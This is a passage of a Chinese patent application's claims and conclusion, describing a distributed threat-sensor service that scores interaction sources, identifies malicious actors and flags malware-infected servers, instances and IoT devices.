至少部分地基于以下一个或多个计算所述显著性得分:从所述交互的所述单个来源接收到的有效负载的所确定分类、与所述交互的所述单个来源交互的不同端口的所确定
数目、与所述交互的所述单个来源交互的威胁传感器的所确定数目、与所述交互的所述单个来源相关联的出站发起连接的所确定数目,或与所述交互的所述单个来源相关联的网络地址的所确定静态或动态性质。
[0335]
条款38.根据条款35到37中任一项所述的一个或多个非暂时性计算机可读存储介质,其中关于与所述相应威胁传感器的所述相应交互的所述信息进一步包括以下一个或多个:所述交互的目标端口、所述交互的有效负载分类、供所述交互使用的协议、检测到所述交互的所述一个或多个威胁传感器,以及关于所述交互是入站发起连接还是出站发起连接还是同时为入站和出站发起连接两者的信息。
[0336]
条款39.根据条款38所述的一个或多个非暂时性计算机可读存储介质,其中所述程序指令进一步使所述分布式威胁传感器数据收集和数据导出组件的所述一个或多个处理器:
[0337]
将接收到的传感器日志流存储在数据库中,包括关于与所述相应威胁传感器的所述相应交互的所述信息,其中所述数据库提供查询接口,用于分析所述接收到的传感器日志流中关于与所述相应威胁传感器的所述相应交互的所述信息。
[0338]
条款40.根据条款35到39中任一项所述的一个或多个非暂时性计算机可读存储介质,其中为了针对所述交互的所述相应各个来源中的至少一些将所述显著性得分中的所述至少一些提供到所述一个或多个目标,所述程序指令进一步使所述分布式威胁传感器数据收集和数据导出组件的所述一个或多个处理器:
[0339]
确定或接收显著性得分阈值;
[0340]
确定超过所述显著性得分阈值的所述显著性得分;以及
[0341]
将所确定的超过所述显著性得分阈值的显著性得分及与所确定的显著性得分相关联的所述交互的所述相应各个来源提供到所述一个或多个目标。
[0342]
还可以根据以下条款描述本公开的实施例:
[0343]
条款41.一种系统,其包括:
[0344]
多个计算装置,其包括相应处理器和存储器用于执行多个威胁传感器,其中所述多个威胁传感器中的各个威胁传感器检测与交互的来源的交互,并且其中所述多个威胁传感器部署在相应的多个不同网络地址处且物理地位于提供商网络中的不同地理区域;
[0345]
一个或多个处理器和相关联存储器,其配置成实施所述提供商网络的分布式威胁传感器分析和相关服务,其中所述分布式威胁传感器分析和相关服务配置成:
[0346]
获得与所述多个威胁传感器交互的所述相应来源的多个单独标识符,以及与所述多个单独标识符中的相应各个标识符相关联的相应显著性得分;
[0347]
至少部分地基于所述显著性得分,确定包括所述多个单独标识符的子集的恶意参与者的标识符;
[0348]
接收多个已知参与者的标识符,其中所述多个已知参与者包括以下一个或多个:所述提供商网络中的服务器、所述提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置;
[0349]
使恶意参与者的所述标识符与已知参与者的所述标识符相关,以将所述已知参与者中的一个或多个识别为被恶意软件感染;以及
[0350]
将所述已知参与者中被恶意软件感染的所述一个或多个的标识符提供到一个或
多个目标。
[0351]
条款42.根据条款41所述的系统,其中所述提供商网络提供多个服务,包含数据库服务,并且其中至少所述恶意参与者的所述标识符或所述已知参与者中被恶意软件感染的所述一个或多个的所述标识符存储在所述提供商网络的所述数据库服务的数据库中。
[0352]
条款43.根据条款41或42中任一项所述的系统,其中所述多个威胁传感器中的至少一特定威胁传感器部署在所述提供商网络外,并且其中为了获得与所述多个威胁传感器交互的所述相应来源的所述多个单独标识符,所述分布式威胁传感器分析和相关服务进一步配置成:
[0353]
获得与所述多个威胁传感器中部署在所述提供商网络外的至少所述特定威胁传感器交互的所述相应来源的所述多个单独标识符。
[0354]
条款44.根据条款41到43中任一项所述的系统,其中为了获得与所述相应各个标识符相关联的所述相应显著性得分,所述分布式威胁传感器分析和相关服务进一步配置成针对与所述多个威胁传感器交互的所述相应来源中的所述交互的单个来源:
[0355]
至少部分地基于所述单个来源在一时间周期内的关于与所述多个威胁传感器的所述交互的聚合信息以及所述单个来源在先前时间周期内的关于交互的聚合信息,确定关于所述单个来源的所述交互发生的新近程度的新近度信息;
[0356]
确定在所述时间周期中的至少一个期间与所述单个来源通信的所述多个威胁传感器的数目;以及
[0357]
至少部分地基于所确定的新近度信息和所确定的与所述单个来源通信的威胁传感器的数目,计算所述交互的所述单个来源的所述相应显著性得分中的显著性得分。
[0358]
条款45.一种方法,其包括:
[0359]
通过分布式威胁传感器分析和相关组件执行以下操作:
[0360]
获得与多个威胁传感器交互的相应来源的多个单独标识符,以及与所述多个单独标识符中的相应各个标识符相关联的相应显著性得分;
[0361]
至少部分地基于所述显著性得分,确定包括所述多个单独标识符的子集的恶意参与者的标识符;
[0362]
接收多个已知参与者的标识符,其中所述多个已知参与者包括以下一个或多个:提供商网络中的服务器、提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置;
[0363]
使恶意参与者的所述标识符与已知参与者的所述标识符相关,以将所述已知参与者中的一个或多个识别为被恶意软件感染;以及
[0364]
将所述已知参与者中被恶意软件感染的所述一个或多个的标识符提供到一个或多个目标。
[0365]
条款46.根据条款45所述的方法,其中确定恶意参与者的所述标识符进一步包括:
[0366]
确定恶意显著性得分,包括高于接收到的或所确定的阈值的所述显著性得分;以及
[0367]
将与所述恶意显著性得分相关联的所述相应各个标识符确定为恶意参与者的所述标识符。
[0368]
条款47.根据条款45或46中任一项所述的方法,其进一步包括:
[0369]
通过所述分布式威胁传感器分析和相关组件执行以下操作:
[0370]
响应于将所述已知参与者中的所述一个或多个识别为被恶意软件感染,发起第一响应性动作,其中所述第一响应性动作包括以下一个或多个:(a)触发执行客户端提供的功能;(b)向所述远程网络或所述客户端网络发送消息,指示所述一个或多个已知参与者;或(c)终止所述提供商网络中特定的一个或多个已知参与者的安全证书。
[0371]
条款48.根据条款45到47中任一项所述的方法,其进一步包括:
[0372]
通过所述分布式威胁传感器分析和相关组件执行以下操作:
[0373]
接收关于将所述已知参与者中的一个或多个识别为被恶意软件感染是否正确的反馈;以及
[0374]
至少部分地基于接收到的反馈,更新与所述相应各个标识符相关联的所述显著性得分。
[0375]
条款49.根据条款45到48中任一项所述的方法,其中获得与所述相应各个标识符相关联的所述相应显著性得分进一步包括:
[0376]
针对与所述多个威胁传感器交互的相应来源中的所述交互的单个来源,通过所述分布式威胁传感器分析和相关组件执行以下操作:
[0377]
至少部分地基于所述单个来源在一时间周期内的关于与所述多个威胁传感器的所述交互的聚合信息以及所述单个来源在先前时间周期内的关于交互的聚合信息,确定关于所述单个来源的所述交互发生的新近程度的新近度信息;
[0378]
确定在所述时间周期中的至少一个期间与所述单个来源通信的所述多个威胁传感器的数目;以及
[0379]
至少部分地基于所确定的新近度信息和所确定的与所述单个来源通信的威胁传感器的数目,计算所述交互的所述单个来源的所述相应显著性得分中的显著性得分。
[0380]
条款50.根据条款49所述的方法,其中计算所述交互的所述单个来源的所述显著性得分进一步包括:
[0381]
至少部分地基于以下一个或多个计算所述显著性得分:从所述交互的所述单个来源接收到的有效负载的所确定分类、与所述交互的所述单个来源交互的不同端口的所确定数目、与所述交互的所述单个来源交互的威胁传感器的所确定数目、与所述交互的所述单个来源相关联的出站发起连接的所确定数目,或与所述交互的所述单个来源相关联的网络地址的所确定静态或动态性质。
[0382]
条款51.根据条款45到50中任一项所述的方法,其中获得与所述相应各个标识符相关联的所述相应显著性得分进一步包括:
[0383]
至少部分地基于关于所述计算的计算的用户输入,计算所述相应显著性得分。
[0384]
条款52.根据条款45到51中任一项所述的方法,其进一步包括:
[0385]
通过所述分布式威胁传感器分析和相关组件执行以下操作:
[0386]
接收以下一个或多个:与所述多个威胁传感器的所述交互的目标端口、与所述多个威胁传感器的所述交互的有效负载分类、供与所述多个威胁传感器的所述交互使用的协议、检测到与所述多个威胁传感器的所述交互的一个或多个威胁传感器,或关于与所述多个威胁传感器的所述交互是入站发起连接还是出站发起连接还是入站和出站发起连接两者的信息;以及
[0387]
其中确定所述恶意参与者的所述标识符进一步至少部分地基于以下一个或多个:交互的所述目标端口、所述交互的所述有效负载分类、供所述交互使用的所述协议、检测到所述交互的所述一个或多个威胁传感器,或关于所述交互是入站发起连接还是出站发起连接还是入站和出站发起连接两者的所述信息。
[0388]
条款53.根据条款45到52中任一项所述的方法,其进一步包括:
[0389]
通过所述分布式威胁传感器分析和相关组件执行以下操作:
[0390]
生成关于识别出的所述已知参与者中被恶意软件感染的所述一个或多个的指标以在用户界面或仪表板中显示。
[0391]
条款54.根据条款45到53中任一项所述的方法,其进一步包括:
[0392]
通过所述分布式威胁传感器分析和相关组件执行以下操作:
[0393]
将恶意参与者的所述标识符和所述已知参与者中被恶意软件感染的所述一个或多个的所述标识符存储在数据库中,其中所述数据库提供查询接口,用于分析关于所述恶意参与者和被恶意软件感染的已知参与者的所述信息。
[0394]
条款55.一个或多个存储程序指令的非暂时性计算机可读存储介质,所述程序指令在分布式威胁传感器分析和相关组件的一个或多个处理器上或跨所述一个或多个处理器执行时使所述一个或多个处理器:
[0395]
获得与多个威胁传感器交互的相应来源的多个标识符,以及与所述多个标识符中的相应标识符相关联的相应显著性得分;
[0396]
至少部分地基于所述显著性得分,确定包括所述多个标识符的子集的恶意参与者的标识符;
[0397]
接收多个已知参与者的标识符,其中所述多个已知参与者包括以下一个或多个:提供商网络中的服务器、提供商网络中的计算实例、客户端网络中的客户端装置或远程网络中部署的iot装置;
[0398]
使恶意参与者的所述标识符与已知参与者的所述标识符相关,以将所述已知参与者中的一个或多个识别为被恶意软件感染;以及
[0399]
将所述已知参与者中被恶意软件感染的所述一个或多个的标识符提供到一个或多个目标。
[0400]
条款56.根据条款55所述的一个或多个非暂时性计算机可读存储介质,其中为了确定恶意参与者的所述标识符,所述程序指令进一步使所述分布式威胁传感器分析和相关组件的所述一个或多个处理器:
[0401]
确定恶意显著性得分,包括高于接收到的或所确定的阈值的所述显著性得分;以及
[0402]
将与所述恶意显著性得分相关联的所述相应标识符确定为恶意参与者的所述标识符。
[0403]
条款57.根据条款55或56中任一项所述的一个或多个非暂时性计算机可读存储介质,其中响应于将所述已知参与者中的所述一个或多个识别为被恶意软件感染,所述程序指令进一步使所述分布式威胁传感器分析和相关组件的所述一个或多个处理器:
[0404]
触发执行客户端提供的功能;
[0405]
向所述远程网络或所述客户端网络发送消息,指示所述一个或多个已知参与者;
或
[0406]
终止所述提供商网络中特定的一个或多个已知参与者的安全证书。
[0407]
条款58.根据条款55到57中任一项所述的一个或多个非暂时性计算机可读存储介质,其中所述程序指令进一步使所述分布式威胁传感器分析和相关组件的所述一个或多个处理器:
[0408]
接收关于将所述已知参与者中的一个或多个识别为被恶意软件感染是否正确的反馈;以及
[0409]
至少部分地基于接收到的反馈,更新与所述相应标识符相关联的所述相应显著性得分。
[0410]
条款59.根据条款55到58中任一项所述的一个或多个非暂时性计算机可读存储介质,其中为了获得与所述相应标识符相关联的所述相应显著性得分,所述程序指令进一步使所述分布式威胁传感器分析和相关组件的所述一个或多个处理器针对与所述多个威胁传感器交互的所述相应来源中的所述交互的单个来源:
[0411]
至少部分地基于所述单个来源在一时间周期内的关于与所述多个威胁传感器的所述交互的聚合信息以及所述单个来源在先前时间周期内的关于交互的聚合信息,确定关于所述单个来源的所述交互发生的新近程度的新近度信息;
[0412]
确定在所述时间周期中的至少一个期间与所述单个来源通信的所述多个威胁传感器的数目;以及
[0413]
至少部分地基于所确定的新近度信息和所确定的与所述单个来源通信的威胁传感器的数目,计算所述交互的所述单个来源的所述相应显著性得分中的显著性得分。
[0414]
条款60.根据条款59所述的一个或多个非暂时性计算机可读存储介质,其中为了计算所述交互的所述单个来源的所述显著性得分,所述程序指令进一步使所述分布式威胁传感器分析和相关组件的所述一个或多个处理器:
[0415]
至少部分地基于以下一个或多个计算所述显著性得分:从所述交互的所述单个来源接收到的有效负载的所确定分类、与所述交互的所述单个来源交互的不同端口的所确定数目、与所述交互的所述单个来源交互的威胁传感器的所确定数目、与所述交互的所述单个来源相关联的出站发起连接的所确定数目,或与所述交互的所述单个来源相关联的网络地址的所确定静态或动态性质。
[0416]
结论
[0417]
各种实施例可进一步包含接收、发送或存储根据以上描述在计算机可访问介质上实施的指令和/或数据。一般来说,计算机可存取介质可包含:存储介质或存储器介质,例如磁介质或光学介质,如磁盘或dvd/cd-rom;易失性或非易失性介质,例如ram(例如,sdram、ddr、rdram、sram等)、rom等;以及传输介质或信号,例如经由网络和/或无线链路等通信介质传送的电气、电磁或数字信号。
[0418]
图中所示和本文所述的各种方法代表了方法的示例性实施例。这些方法可以用软件、硬件或其组合来实施。方法的次序可以更改,各种元件可以添加、重新排序、组合、省略、修改等。
[0419]
可以进行各种修改和更改,这对于受益于本公开的本领域技术人员来说是显而易见的。它旨在包含所有此类修改和更改,因此上述描述应视为说明性的,而非限制性的。
相关技术
网友询问留言
已有0条留言
- 还没有人留言评论。精彩留言会获得点赞!
1